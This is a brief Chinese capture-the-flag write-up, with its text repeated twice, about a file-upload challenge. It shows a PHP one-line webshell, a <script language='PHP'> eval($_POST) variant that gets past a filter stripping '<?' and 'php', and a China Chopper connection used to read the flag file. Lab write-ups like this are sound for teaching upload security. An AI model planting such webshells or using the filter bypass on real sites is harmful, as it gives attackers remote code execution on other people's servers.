打开题目链接:
可以随意上传文件, 上传图片,txt文件,php文件等都能上传上去;
试着上传一句话;
当上传一句话木马时,上传成功后,原文件变成了如下:
把<?和php过滤掉了,再上传另一个一句话;
<script language="PHP">
@eval($_POST["code"]);
</script>
上传后连接菜刀;
由刚开始题上说,flag在flag文件中,打开flag文件就可以看到flag;
打开题目链接:
可以随意上传文件, 上传图片,txt文件,php文件等都能上传上去;
试着上传一句话;
当上传一句话木马时,上传成功后,原文件变成了如下:
把<?和php过滤掉了,再上传另一个一句话;
<script language="PHP">
@eval($_POST["code"]);
</script>
上传后连接菜刀;
由刚开始题上说,flag在flag文件中,打开flag文件就可以看到flag;